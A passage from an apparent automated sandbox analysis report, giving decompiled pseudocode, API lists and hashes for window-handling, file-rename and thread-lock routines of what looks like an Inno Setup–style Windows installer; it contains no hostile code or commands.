                                                                    0x006159e2
                                                                    0x006159e3
                                                                    0x006159e8
                                                                    0x006159eb
                                                                    0x006159f4
                                                                    0x006159fb
                                                                    0x006159fe
                                                                    0x00615a01
                                                                    0x00615a06
                                                                    0x00615a0b
                                                                    0x00615a0b
                                                                    0x00615a0d
                                                                    0x00615993
                                                                    0x00615993
                                                                    0x00615993
                                                                    0x00615994
                                                                    0x00615a7c
                                                                    0x00615a7d
                                                                    0x00615a82
                                                                    0x00615a85
                                                                    0x00615a96
                                                                    0x00615a9d
                                                                    0x00615a9e
                                                                    0x00615aa3
                                                                    0x00615aa6
                                                                    0x00615aa9
                                                                    0x00615aae
                                                                    0x00615ab1
                                                                    0x00615abf
                                                                    0x00615ac4
                                                                    0x00615ac4
                                                                    0x00615ae3
                                                                    0x00615af3
                                                                    0x00615b06
                                                                    0x00615b0e
                                                                    0x00615b17
                                                                    0x00615b1a
                                                                    0x00615b44
                                                                    0x00615b4a
                                                                    0x00615b4f
                                                                    0x00615b56
                                                                    0x00615b59
                                                                    0x0061599a
                                                                    0x0061599a
                                                                    0x0061599a
                                                                    0x0061599b
                                                                    0x00615b72
                                                                    0x00615b73
                                                                    0x00615b78
                                                                    0x00615b7b
                                                                    0x00615b83
                                                                    0x00615b9e
                                                                    0x00615ba6
                                                                    0x00615baf
                                                                    0x00615bb2
                                                                    0x006159a1
                                                                    0x006159a1
                                                                    0x006159a2
                                                                    0x00615bc5
                                                                    0x00615bc6
                                                                    0x00615bcb
                                                                    0x00615bce
                                                                    0x00615bd6
                                                                    0x00615bf1
                                                                    0x00615bf9
                                                                    0x00615c02
                                                                    0x00615c05
                                                                    0x00615c05
                                                                    0x006159a2
                                                                    0x0061599b
                                                                    0x00000000
                                                                    0x00615994
                                                                    0x00615909
                                                                    0x00615909
                                                                    0x0061590e
                                                                    0x0061591d
                                                                    0x00615926
                                                                    0x0061592b
                                                                    0x00615932
                                                                    0x00615941
                                                                    0x00615910
                                                                    0x00615910
                                                                    0x00615911
                                                                    0x0061594b
                                                                    0x00615952
                                                                    0x00615955
                                                                    0x00615959
                                                                    0x00615968
                                                                    0x00615913
                                                                    0x00615916
                                                                    0x00615979
                                                                    0x00615918
                                                                    0x00615c25
                                                                    0x00615c33
                                                                    0x00615c33
                                                                    0x00615916
                                                                    0x00615911
                                                                    0x00615c36
                                                                    0x00615c38
                                                                    0x00615c3b
                                                                    0x00615c5a
                                                                    0x00615c5d
                                                                    0x00615c60
                                                                    0x00615c6b
                                                                    0x00615c7d
                                                                    0x00615c7d

                                                                    APIs
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                                    • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                                    • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                    • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                                    • API String ID: 602442252-4088602279
                                                                    • Opcode ID: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
                                                                    • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                                    • Opcode Fuzzy Hash: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
                                                                    • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0060D8B0(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v41;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				void* __ecx;
				char _t90;
				char _t167;
				char _t168;
				intOrPtr _t171;
				intOrPtr _t179;
				intOrPtr _t186;
				intOrPtr _t207;
				intOrPtr _t217;
				intOrPtr _t218;

				_t215 = __esi;
				_t214 = __edi;
				_t217 = _t218;
				_t171 = 8;
				goto L1;
				L4:
				if(E005C77E8() != 0) {
					__eflags = _t167;
					if(__eflags == 0) {
						E0060D650(_v8, _t167,  &_v68, _t214, _t215, __eflags);
						E0040A5F0( &_v8, _v68);
						__eflags = _v12;
						if(__eflags != 0) {
							E0060D650(_v12, _t167,  &_v72, _t214, _t215, __eflags);
							E0040A5F0( &_v12, _v72);
						}
					}
					_t90 = E0060C558(_t167, _v12, _v8, 5);
					__eflags = _t90;
					if(_t90 == 0) {
						E0060CE84(L"MoveFileEx");
					}
					__eflags = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(E0060DBD9);
					E0040A228( &_v72, 7);
					return E0040A228( &_v32, 7);
				} else {
					E005C7430( &_v16);
					E005C4EA4(_v16,  &_v56);
					E0040B4C8( &_v20, L"WININIT.INI", _v56);
					E0060D294(0, _t167, L".tmp", _v16, _t214, _t215,  &_v24);
					_push(_t217);
					_push(0x60db3e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t218;
					_v36 = 0;
					_v40 = 0;
					_push(_t217);
					_push(0x60dae2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t218;
					WritePrivateProfileStringW(0, 0, 0, E0040B278(_v20));
					_v36 = E005CBFB8(1, 1, 0, 3);
					_t179 = _v24;
					_v40 = E005CBFB8(1, 0, 1, 0);
					_v41 = 0;
					_t168 = 0;
					while(E005CC258(_v36) == 0) {
						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
						E004225EC(_v28, 1,  &_v32, _t215);
						__eflags = _v32;
						if(__eflags == 0) {
							L11:
							E005CC5A0(_v40, 1, _v28, _t215, __eflags);
							_t168 = 0;
							__eflags = 0;
							continue;
						} else {
							__eflags =  *_v32 - 0x5b;
							if(__eflags != 0) {
								goto L11;
							} else {
								__eflags = E00422368(_v32, _t179, L"[rename]");
								if(__eflags != 0) {
									__eflags = _v41;
									if(__eflags == 0) {
										goto L11;
									}
								} else {
									_v41 = 1;
									goto L11;
								}
							}
						}
						break;
					}
					_t223 = _v41;
					if(_v41 == 0) {
						E005CC5A0(_v40, _t168, L"[rename]", _t215, _t223);
					}
					_t224 = _v12;
					if(_v12 == 0) {
						E0040A5F0( &_v32, 0x60dc48);
					} else {
						E005C73D8(_v12, _t179,  &_v32, _t224);
					}
					_push(_v32);
					_push(0x60dc5c);
					E005C73D8(_v8, _t179,  &_v64, _t224);
					_push(_v64);
					E0040B550( &_v60, _t168, 3, _t214, _t215);
					E005CC5A0(_v40, _t168, _v60, _t215, _t224);
					_t225 = _t168;
					if(_t168 != 0) {
						E005CC5A0(_v40, _t168, _v28, _t215, _t225);
					}
					while(E005CC258(_v36) == 0) {
						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
						E005CC5A0(_v40, _t168, _v28, _t215, __eflags);
					}
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(E0060DAE9);
					E00408444(_v40);
					return E00408444(_v36);
				}
				L1:
				_push(0);
				_push(0);
				_t171 = _t171 - 1;
				if(_t171 != 0) {
					goto L1;
				} else {
					_t1 =  &_v8;
					 *_t1 = _t171;
					_push(__esi);
					_push(__edi);
					_v12 =  *_t1;
					_v8 = __edx;
					_t167 = __eax;
					E0040A2AC(_v8);
					E0040A2AC(_v12);
					_push(_t217);
					_push(0x60dbd2);
					 *[fs:eax] = _t218;
					E005C52C8(_v8,  &_v48, _t217,  *[fs:eax]);
					E0040A5F0( &_v8, _v48);
					if(_v12 != 0) {
						E005C52C8(_v12,  &_v52, _t217);
						E0040A5F0( &_v12, _v52);
					}
				}
				goto L4;
			}






























                                                                    0x0060d8b0
                                                                    0x0060d8b0
                                                                    0x0060d8b1
                                                                    0x0060d8b4
                                                                    0x0060d8b4
                                                                    0x0060d91e
                                                                    0x0060d925
                                                                    0x0060db57
                                                                    0x0060db59
                                                                    0x0060db61
                                                                    0x0060db6c
                                                                    0x0060db71
                                                                    0x0060db75
                                                                    0x0060db7d
                                                                    0x0060db88
                                                                    0x0060db88
                                                                    0x0060db75
                                                                    0x0060db97
                                                                    0x0060db9c
                                                                    0x0060db9e
                                                                    0x0060dba5
                                                                    0x0060dba5
                                                                    0x0060dbaa
                                                                    0x0060dbac
                                                                    0x0060dbaf
                                                                    0x0060dbb2
                                                                    0x0060dbbf
                                                                    0x0060dbd1
                                                                    0x0060d92b
                                                                    0x0060d92e
                                                                    0x0060d939
                                                                    0x0060d949
                                                                    0x0060d95c
                                                                    0x0060d963
                                                                    0x0060d964
                                                                    0x0060d969
                                                                    0x0060d96c
                                                                    0x0060d971
                                                                    0x0060d976
                                                                    0x0060d97b
                                                                    0x0060d97c
                                                                    0x0060d981
                                                                    0x0060d984
                                                                    0x0060d996
                                                                    0x0060d9b0
                                                                    0x0060d9b9
                                                                    0x0060d9c8
                                                                    0x0060d9cb
                                                                    0x0060d9cf
                                                                    0x0060da24
                                                                    0x0060d9d9
                                                                    0x0060d9e6
                                                                    0x0060d9eb
                                                                    0x0060d9ef
                                                                    0x0060da17
                                                                    0x0060da1d
                                                                    0x0060da22
                                                                    0x0060da22
                                                                    0x00000000
                                                                    0x0060d9f1
                                                                    0x0060d9f4
                                                                    0x0060d9f8
                                                                    0x00000000
                                                                    0x0060d9fa
                                                                    0x0060da07
                                                                    0x0060da09
                                                                    0x0060da11
                                                                    0x0060da15
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060da0b
                                                                    0x0060da0b
                                                                    0x00000000
                                                                    0x0060da0b
                                                                    0x0060da09
                                                                    0x0060d9f8
                                                                    0x00000000
                                                                    0x0060d9ef
                                                                    0x0060da30
                                                                    0x0060da34
                                                                    0x0060da3e
                                                                    0x0060da3e
                                                                    0x0060da43
                                                                    0x0060da47
                                                                    0x0060da5e
                                                                    0x0060da49
                                                                    0x0060da4f
                                                                    0x0060da4f
                                                                    0x0060da63
                                                                    0x0060da66
                                                                    0x0060da71
                                                                    0x0060da76
                                                                    0x0060da81
                                                                    0x0060da8c
                                                                    0x0060da91
                                                                    0x0060da93
                                                                    0x0060da9b
                                                                    0x0060da9b
                                                                    0x0060dab8
                                                                    0x0060daa8
                                                                    0x0060dab3
                                                                    0x0060dab3
                                                                    0x0060dac6
                                                                    0x0060dac9
                                                                    0x0060dacc
                                                                    0x0060dad4
                                                                    0x0060dae1
                                                                    0x0060dae1
                                                                    0x0060d8b9
                                                                    0x0060d8b9
                                                                    0x0060d8bb
                                                                    0x0060d8bd
                                                                    0x0060d8be
                                                                    0x00000000
                                                                    0x0060d8c0
                                                                    0x0060d8c0
                                                                    0x0060d8c0
                                                                    0x0060d8c4
                                                                    0x0060d8c5
                                                                    0x0060d8c6
                                                                    0x0060d8c9
                                                                    0x0060d8cc
                                                                    0x0060d8d1
                                                                    0x0060d8d9
                                                                    0x0060d8e0
                                                                    0x0060d8e1
                                                                    0x0060d8e9
                                                                    0x0060d8f2
                                                                    0x0060d8fd
                                                                    0x0060d906
                                                                    0x0060d90e
                                                                    0x0060d919
                                                                    0x0060d919
                                                                    0x0060d906
                                                                    0x00000000

                                                                    APIs
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWrite
                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                    • API String ID: 390214022-3304407042
                                                                    • Opcode ID: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
                                                                    • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                                    • Opcode Fuzzy Hash: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
                                                                    • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00408E18(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E004092D8(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040901C(_t71);
								_t57 =  *0x6cf8fc; // 0x6c76d4
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00408AF8( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                    0x00408e1f
                                                                    0x00408e21
                                                                    0x00408e23
                                                                    0x00408e26
                                                                    0x00408e26
                                                                    0x00408e2d
                                                                    0x00408e34
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408e42
                                                                    0x00408e49
                                                                    0x00408ee1
                                                                    0x00408ee1
                                                                    0x00408ee1
                                                                    0x00408ee5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ef0
                                                                    0x00408ef6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ef8
                                                                    0x00408ef8
                                                                    0x00408efd
                                                                    0x00408f03
                                                                    0x00408f0a
                                                                    0x00408f14
                                                                    0x00408f19
                                                                    0x00408f20
                                                                    0x00408f27
                                                                    0x00408f35
                                                                    0x00408f43
                                                                    0x00408f37
                                                                    0x00408f3f
                                                                    0x00408f3f
                                                                    0x00408f35
                                                                    0x00408f49
                                                                    0x00408f6b
                                                                    0x00408f74
                                                                    0x00408f78
                                                                    0x00408f7c
                                                                    0x00000000
                                                                    0x00408f4b
                                                                    0x00408f4b
                                                                    0x00408f50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408f5c
                                                                    0x00408f62
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408f64
                                                                    0x00000000
                                                                    0x00408f64
                                                                    0x00408f4b
                                                                    0x00408f81
                                                                    0x00408f81
                                                                    0x00408f90
                                                                    0x00408f97
                                                                    0x00408f9a
                                                                    0x00408f9a
                                                                    0x00000000
                                                                    0x00408f90
                                                                    0x00000000
                                                                    0x00408ee1
                                                                    0x00408e54
                                                                    0x00408e5a
                                                                    0x00408e60
                                                                    0x00408ebc
                                                                    0x00408ebf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ec6
                                                                    0x00408ece
                                                                    0x00408ed4
                                                                    0x00408edf
                                                                    0x00000000
                                                                    0x00408edf
                                                                    0x00408ed6
                                                                    0x00000000
                                                                    0x00408ed6
                                                                    0x00000000
                                                                    0x00408e62
                                                                    0x00408e65
                                                                    0x00000000
                                                                    0x00408e74
                                                                    0x00408e74
                                                                    0x00408e74
                                                                    0x00000000
                                                                    0x00408e7d
                                                                    0x00408e80
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408e85
                                                                    0x00408eae
                                                                    0x00408eb2
                                                                    0x00408eb7
                                                                    0x00408eba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408eba
                                                                    0x00408e8e
                                                                    0x00408e94
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408e9b
                                                                    0x00408e9e
                                                                    0x00408ea5
                                                                    0x00000000
                                                                    0x00408ea5
                                                                    0x00408fa1
                                                                    0x00408fac

                                                                    APIs
                                                                      • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                                    • GetTickCount.KERNEL32 ref: 00408E4F
                                                                    • GetTickCount.KERNEL32 ref: 00408E67
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                                    • GetTickCount.KERNEL32 ref: 00408EC1
                                                                    • GetTickCount.KERNEL32 ref: 00408EF8
                                                                    • GetTickCount.KERNEL32 ref: 00408F22
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick$CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 3968769311-0
                                                                    • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                    • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                                    • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                    • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E005B85F0(void* __eax, void* __ecx, struct tagMSG* __edx) {
				char _v19;
				char _t12;
				int _t13;
				void* _t14;
				int _t30;
				int _t32;
				MSG* _t43;
				void* _t44;
				char* _t46;

				_t43 = __edx;
				_t44 = __eax;
				_t32 = 0;
				if(PeekMessageW(__edx, 0, 0, 0, 0) != 0) {
					_v19 = _t12;
					if(_v19 == 0) {
						_t13 = PeekMessageA(_t43, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t13 + 1;
					} else {
						_t30 = PeekMessageW(_t43, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t30 + 1;
					}
					if(_t14 != 0) {
						_t32 = 1;
						if(_t43->message == 0x12) {
							 *((char*)(_t44 + 0xbc)) = 1;
						} else {
							 *_t46 = 0;
							if( *((short*)(_t44 + 0x122)) != 0) {
								 *((intOrPtr*)(_t44 + 0x120))();
							}
							if(E005BA368(_t44, _t43) == 0 && E005B8488(_t44, _t43) == 0 &&  *_t46 == 0 && E005B8340(_t44, _t43) == 0 && E005B8390(_t44, _t43) == 0 && E005B82F8(_t44, _t43) == 0) {
								TranslateMessage(_t43);
								if(_v19 == 0) {
									DispatchMessageA(_t43);
								} else {
									DispatchMessageW(_t43);
								}
							}
						}
					}
				}
				return _t32;
			}












                                                                    0x005b85f5
                                                                    0x005b85f7
                                                                    0x005b85f9
                                                                    0x005b860b
                                                                    0x005b8627
                                                                    0x005b8630
                                                                    0x005b8651
                                                                    0x005b8659
                                                                    0x005b865b
                                                                    0x005b8632
                                                                    0x005b863b
                                                                    0x005b8643
                                                                    0x005b8645
                                                                    0x005b8645
                                                                    0x005b865e
                                                                    0x005b8664
                                                                    0x005b866a
                                                                    0x005b86f2
                                                                    0x005b8670
                                                                    0x005b8670
                                                                    0x005b867c
                                                                    0x005b8688
                                                                    0x005b8688
                                                                    0x005b8699
                                                                    0x005b86d6
                                                                    0x005b86e0
                                                                    0x005b86eb
                                                                    0x005b86e2
                                                                    0x005b86e3
                                                                    0x005b86e3
                                                                    0x005b86e0
                                                                    0x005b8699
                                                                    0x005b866a
                                                                    0x005b865e
                                                                    0x005b8700

                                                                    APIs
                                                                    • PeekMessageW.USER32 ref: 005B8604
                                                                    • IsWindowUnicode.USER32 ref: 005B8618
                                                                    • PeekMessageW.USER32 ref: 005B863B
                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                                    • TranslateMessage.USER32 ref: 005B86D6
                                                                    • DispatchMessageW.USER32 ref: 005B86E3
                                                                    • DispatchMessageA.USER32 ref: 005B86EB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                    • String ID:
                                                                    • API String ID: 2190272339-0
                                                                    • Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                                    • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                                    • Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                                    • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E005C92C8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t10;
				intOrPtr* _t27;
				void* _t42;
				intOrPtr _t44;
				void* _t49;
				intOrPtr _t51;
				struct HWND__* _t52;
				intOrPtr _t54;
				intOrPtr _t55;

				_t50 = __esi;
				_t42 = __edx;
				_t54 = _t55;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(__edx != 0) {
					_t55 = _t55 + 0xfffffff0;
					_t10 = E00408A40(_t10, _t54);
				}
				_t49 = _t10;
				_push(_t54);
				_push(0x5c93da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55;
				E00408414(0);
				 *((intOrPtr*)(_t49 + 0xc)) = GetActiveWindow();
				 *((intOrPtr*)(_t49 + 0x10)) = GetFocus();
				 *((intOrPtr*)(_t49 + 0x14)) = E005ABB4C(0, _t42, _t49, _t50);
				if( *0x6d5822 == 0) {
					 *0x6d5822 = RegisterClassW(0x6ccd0c);
				}
				if( *0x6d5822 != 0) {
					_t51 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x88000000);
					 *((intOrPtr*)(_t49 + 8)) = _t51;
					if(_t51 != 0) {
						_t5 = _t49 + 8; // 0x4134a000
						_t27 =  *0x6cdec4; // 0x6d579c
						E005B8044( *_t27,  &_v8);
						E0040B278(_v8);
